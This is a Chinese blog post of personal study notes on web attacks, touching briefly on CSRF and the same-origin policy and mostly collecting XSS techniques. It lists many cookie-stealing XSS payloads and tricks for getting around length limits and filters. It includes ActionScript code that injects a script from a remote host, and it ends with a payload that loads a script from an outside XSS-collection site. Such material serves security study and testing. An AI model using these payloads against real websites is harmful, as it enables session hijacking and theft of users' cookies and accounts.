web_XSS安全学习

最新推荐文章于 2024-04-15 22:13:21 发布
最新推荐文章于 2024-04-15 22:13:21 发布
阅读量6.3k 收藏 3
点赞数
分类专栏: 渗透学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zcc1414/article/details/39343431
版权

下面是 自己学习时的笔记,各种转载~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

漏洞知识库:

 CSRF 跨站请求伪造 学习

crossdomain.xml 文件来验证是否允许客户端的flash 跨域发送请求,使用的是白名单的思想

使用 token 足够复杂来防御

同源政策

a.com 通过 <script src=http://b.com/b.js></script> 加载了b.com 的b.js 但是b.js 是运行在a.com 页面的所以对于a.com来说,b.js的源就应该是a.com而非b.com

<script> <img> <iframe> <link> 等标签都可以跨域加载资源而不受同源政策的限制,这些带<src> 属性的标签加载时实际上就是由浏览器发起了一次 GET请求

不同于 XMLHttpRequest 的是,通过src 属性加载的资源,浏览器限制了 JAVASCRIPT的权限,使其不能读写返回的内容

flash 通过目标网站提供的crossdomain.xml文件判断是否允许当前“源”的flash跨域访问目标资源,eg:

当浏览器在任意其他域的页面里加载了FLASH后,如果对www.qq.com发起访问请求,flash会先检查 www.qq.com 上此策略文件是否存在。如果文件存在,则检查发起请求的域是否在许可范围内。

在flash 9及其以后的版本中,还实现了MIME检查以确认crossdomain.xml是否合法,如查看服务器返回的HTTP头等信息,FLASH还会检查 crossdomain.xml是否存在根目录下,使得一些上传文件攻击失效

<cross-domain-policy>
  <allow-access-from domainm="*.wooyun.org"/>
  <allow-access-from domainm="*.qq.org"/>
</cross-domain-policy>


2 XSS 学习  CROSS SITE SCRIPT

XXS 构造技巧

检测是否出现 <script>alert("xss")</script>

<iframe οnlοad=alert(document.cookie)>

 <script>alert("xss");</script>

<img src=x οnerrοr=alert(1)>

xxx<script>alert(/xss/);</script>

javascript:alert(document.cookie);

"><img src="a" οnerrοr="prompt">

<div style="background:url('javascript:alert(1)')">

<img src="some.gif" οnlοad="alert('xss');" /> 

<img src=x οnerrοr=jQuery.getScript('hook Address') width=0px> (不让图片显示出来)


%c1";alert(/xss/);//     系统转义了" , 接着%c1\   这两个字符组合在一起后,会成为一个UNICODE字符 从而绕过系统安全检查

工具使用:  市面上的软件(JSky、Safe3WVS、Netsparker等)都可以挖掘出反射XSS

PHP获取IP有3个函数

X-Forwarded-For Header(工具)就是对其中一个函数X_FORWARDED_FOR起作用,X_FORWARDED_FOR

有个缺陷可以使客户端伪造任意IP,当然包括字符串,但是对其他两个函数就不行了

Modify Headers(工具)可以伪造数据包内容,当然也可以伪造HTTP_CLIENT_IP来更改IP

构造IP  为 <script>alert(1)</script>  可以看一些弹框了

XSS不一定是在input输入框和GET/POST参数修改,才可以插入XSS。还有JavaScript、ActionScript2/3.0、数据包参数


学习突破字数限制

限制20字节类型,<input type=text value="xxx" /> 利用事件输入 " οnclick=alert(1)//     实际为 <input type=text value="" οnclick=alert(1)//">


首先先发一篇标题为:”>/*</script>
再发一篇标题为:"><script>alert(/Jin/)/*
拼凑起来 <script>alert(/XSS/)/*xxxxxx*/</script>


同样的思想,可以在限制字符时,第一个文本框小,第二个文本框大,那么直接在两个文本框之间的html代码全部注释掉,从而”打通“两个<input>

第一个输入  "><!--_(空格)  只有6字节     第二个输入  --><script>alert(/xss/);</script>


可以加载其他可控的安全数据位置的数据,EG:

<div id="x">alert%28document.cookie%29%3B</div>
<limited_xss_point>eval(unescape(x.innerHTML));</limited_xss_point>

如果没有这些数据,就通过在URL的尾部参数构造要执行的代码,然后在XSS点通过document.URL/location.href等方式获得代码数据执行

http://www.xssedsite.com/xssed.php?x=1....&alert(document.cookie)

<limited_xss_point>eval(document.URL.substr(80));</limited_xss_point>
30字节 (上)    或者  31字节 (下) 

<limited_xss_point>eval(location.href.substr(80));</limited_xss_point>
 或者 29字节 (下) 
<limited_xss_point>eval(document.URL.slice(80));</limited_xss_point>
 或者 30字节 (下) 
<limited_xss_point>eval(location.href.slice(80));</limited_xss_point>
或者更少  说明在下面 
<limited_xss_point>eval(location.hash.slice(1));</limited_xss_point>

location.hash 可以用来获取或设置页面的标签值,不会在HTTP包中发送,所以服务器端的WEB日志中并不会记录下 location.hash 里的内容,从而也更好地隐藏了hacker的意图
<input type=text value="xxx" />  输入40字节 " οnclick="eval(location.hash.substr(1)) 

得到 <input type=text value="" οnclick="eval(location.hash.substr(1))" /> 

#是用来指导浏览器动作的,对服务器端完全无用。所以,HTTP请求中不包括#。

因为location.hash 的第一个值 为 # ,所以构造 url 为 www.xxx.com/test.html#alert(xss)

所以这里的 XSS PAYLOAD 是写在 浏览器的地址栏的。可以直接写在url,也可以利用其它平台上文件来写


还有可以关注函数

function loads(url) {
...
document.body.appendChild(script);
}

<limited_xss_point>loads(http://xxx.com/x);</limited_xss_point>

其他了解

<base> 是个非常危险的标签,如果在页面上插入了它,那么就可以在远程主机上伪造图片,链接或者脚本了(从标签指定的网址上取得到).


window.name  可以实现跨域传输,那么构造 

window.name = "alert(document.cookie)";

location.href = "http://www.xxx.com/xss.php" 只需通过XSS执行 eval(name); 只有11字节


flash XSS  ,Action script 是一种非常强大和灵活的脚本,甚至可以使用它发起网络连接,因此应该尽可能地禁止用户能够上传加载自定义的FLASH文件


看embed 的 allowscriptaccess 参数 是否开启

<embed> 标签定义嵌入的内容,比如插件。 <embed src="http://xxx.com/evil.swf"> </embed>

用  flex builder  编译 as 生产swf然后去执行JS代码,编译修改名为 xxx.as

package {
import flash.display.Sprite;
import flash.external.ExternalInterface;
public class XXX extends Sprite

{
public function XXX()

{
if(flash.external.ExternalInterface.available){

flash.external.ExternalInterface.call("eval","(function(){var s=document.createElement('script');s.type='text/javascript';s.src='http://xxx.com/xxx.js';document.body.appendChild(s);})()");
}
}
}
}
然后可以先上传上去,然后 
<embed src="刚才复制的FLASH文件地址" type="application/x-shockwave-flash"></embed>
<img src="刚才复制的FLASH文件地址"></img>



发现地方 处写上    57字节

</textarea>'"><script src=http://xssan.com/9AM3zw?1410919704></script>

最低0.47元/天 解锁文章
pandamac
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xxxxxxxxxxxxxxxxxxxxxxxxxxxx
weixin_34273481的博客
04-05 69万+
Get Authorization code:Request: https://accounts.google.com/o/oauth2/v2/auth?redirect_uri=https%3A%2F%2Fdevelopers.google.com%2Foauthplayground&prompt=consent&response_type=code&client_id=...
xx-Pixiv Spider
MoltenDivineCore的博客
04-19 2万+
import requests from lxml import etree import json import os # 缺陷 1:下载的是图片合集,会下载其他角色的图片 # 缺陷 2:不能存 gif,因为P站的 gif 图片用的是我还不懂的方式 #================================================ #设置一个 Session 保持会话 se = requests.session() # E:\\0-Picture\\3-明日方舟\\鞭刃\\ # E.
XSS漏洞类型原理及防御方式_三种xss漏洞防御,2024年最新带你全面掌握高级知识点
uiuuyy67的博客
04-15 2943
XSS全称是Cross Site Scripting即跨站脚本,为了与层叠样式表Cascading Style Sheets,CSS)的缩写进行区分,将跨站脚本攻击缩写为XSS,其本质是攻击者在web页面插入恶意的script代码(这个代码可以是JS脚本、CSS样式或者其他意料之外的代码),当用户浏览该页面之时,嵌入其中的script代码会被执行,从而达到恶意攻击用户的目的。
网络安全课第二节 XSS漏洞检测防御
fegus的博客
07-11 2122
从本讲开始,我将带你进入 Web 漏洞攻防的世界,学习一些常见的 Web 漏洞的原理、利用与防御。在这些常见的Web 漏洞中,XSS(Cross-site Script,跨站脚本)漏洞无疑是最多见的。根据 HackerOne 漏洞奖励平台发布的 The 2020 Hacker Report,XSS 漏洞类型占所有报告漏洞中的 23%,排名第一。因此,在“模块二:漏洞攻防案例”,我特意以 XSS 作为讲解的第一个漏洞类型。图 1:HackerOne 平台上报告的漏洞类型占比最早的 XSS 漏洞可追溯到 199
http://www.htsjpt.com/admin.php,webshell/php/xiao.php.txt at f875e7b78085777b8a10c3456478dbd192d851a...
热门推荐
weixin_39980575的博客
03-13 59万+
eval(gzuncompress(base64_decode("eJzsvfl3G8eROP6z/J7/h9GYK4AmiIP3IVDiTUq8RJA6qceHY0BABDDQAOAhW/u/MNpNvLJ2I0qkLoq6SJsUZVEUSUmOnnP4WCeO1slGzsd2rDjvW9XHTA8wACnFye7nky9tkUAf1dXV1dXV1dXViqap2rCmJFUtHU2M2Ku...
www.xxx.com 与 m.xxx.com 的Nginx服务器实现
weixin_30662109的博客
11-24 3万+
六、CentOS 6.5 下Nginx的配置 转载于:https://www.cnblogs.com/hfultrastrong/p/7892123.html
网络攻防课程seed-labs实验-Web_XSS_Elgg.zip
最新发布
06-01
【网络攻防课程seed-labs实验-Web_XSS_Elgg.zip】是一个针对网络安全学习的实验,主要关注Web应用程序中的跨站脚本(XSS)攻击。XSS是一种常见的网络攻击方式,攻击者通过在网页中注入恶意脚本,使用户在不知情的...
xss.zip_3A58_XSS 检测_country59a_xss/level11_xss
09-20
XSS漏洞详解:从基础到进阶》 XSS(Cross Site Scripting),即跨站脚本攻击,是网络安全领域常见的漏洞类型之一。...在“xss.zip”中的挑战,我们有机会深入学习XSS,从理论到实践,不断提升自身的安全防护水平。
web安全XSS攻击demo
04-18
Web安全是信息技术领域中的一个重要分支,它关注的是保护网络应用程序免受恶意攻击和未经授权的访问。...通过学习和实践"web安全XSS攻击demo",你可以更深入地理解XSS的工作原理,并掌握有效的防御策略。
WEB渗透学习-XSS-labs靶场
04-20
XSS-labs是一个专门针对XSS学习平台,为网络安全从业者和新手提供了丰富的练习场景,帮助他们深入理解和掌握这种攻击手段。 XSS-labs设计了一套关卡制的学习路径,由浅入深,逐步提高难度。每个关卡都代表一种或...
白帽子讲web安全_WEB安全_
09-29
《白帽子讲Web安全》这本书将详细讲解这些概念,提供实例解析,帮助读者理解Web安全的实际威胁,学习防范策略,提升网络安全防护技能。无论你是开发者、系统管理员还是网络安全爱好者,都能从中受益匪浅。
解决“The method XXXXXX of type XXXXXXXXX must override a superclass method”
ChinaRen69fy的专栏
07-03 15万+
我的Eclipse版本是3. 6.1   @Override 时出现以下错误:    The method XXXXXX   of type XXXXXXXXX must  override a superclass method    上网搜索原来原因是: 实现类里面使用了 @Override,那么在JDK1.5下要使用@Override
linux常识
boy8239的专栏
11-06 1万+
有shutdown、halt、reboot、及init,它们都可以达到重启系统的目的,但每个命令的内部工作过程是不同的。   1.shutdown   shutdown命令安全地将系统关机。有些用户会使用直接断掉电源的方式来关闭linux,这是十分危险的。因为linux与windows不同,其后台运行着许多进程,所以强制关机可能会导致进程的数据丢失﹐使系统处于不稳定的状态﹐甚至在有的系统中会损坏硬
XSS利用姿势-会话劫持-->不只是弹cookie
风雨来花满楼的博客
09-28 989
描述(这里直接使用项目作者原话): SuperXSS项目地址: https://github.com/kagurazakasanae/SuperXSS 引言:当X别人站的时候,遇到Httponly flag时,被x到的站位于内网无法直接访问时,你要做的是:使用SuperXSSS SuperXSS是一个基于Websocket的客户端网页代理程序,客户端JS被注入之后会创建到指定服务端的Websocket连接并接收命令进行XHR请求,从而使得无法直接访问的后台等可以通过客户端浏览器本身作为代理访问。 程序
2018-04-21-linux-sources-list html-url、隐藏滚动条
洪君的博客
04-24 18万+
title layout categories tags excerpt Kali Linux之软件安装、卸载、更新和修改更新源 post Linux Linux安装软件 Linux更新源 Linux系统软件安装、卸载、更新与修改更新源 使用Linux系统,与Windows系统一样,也需要及时进行软件与系...
WebXSS
qq_62803993的博客
01-09 315
(1)输入在标签间的情况:测试是否被过滤或转义,若无则直接(2)输入在 script标签内:我们需要在保证内部JS语法正确的前提下,去插入我们的 payload。如果我们的输岀在字符串内部,测试字符串能否被闭合。如果我们无法闭合包裹字符串的引号,这个点就很难利用了可能的解决方案:可以控制两处输入且\可用、存在宽字节(3)输入在HTML属性內:首先査看属性是否有双引号包裏、没有则直接添加新的事件属性;
JS设置Cookie,及COOKIE的限制
05-19 1万+
 在Javascript脚本里,一个cookie 实际就是一个字符串属性。当你读取cookie的值时,就得到一个字符串,里面当前WEB页使用的所有cookies的名称和值。每个cookie除了 name名称和value值这两个属性以外,还有四个属性。这些属性是: expires过期时间、 path路径、 domain域、以及 secure安全。Expires – 过期时间。指定cookie的生
编码释疑
生活在别处
11-10 4953
目录 1. ASCII编码 2. ANSI编码 3.ISO/IEC 8859 4. Unicode 5. UTF-8编码 6. UTF-16编码 7. UTF-32编码 8. GB2312编码 9. GBK编码 10. BG18030 11. BIG5编码 12. URL编码 13. escape编码 14. BASE64编码 15. 其他小变种编...
XSS-Payload大全
gy1bubble的博客
10-11 1382
<body oninput=javascript:alert(1)><input autofocus> <math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKM.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值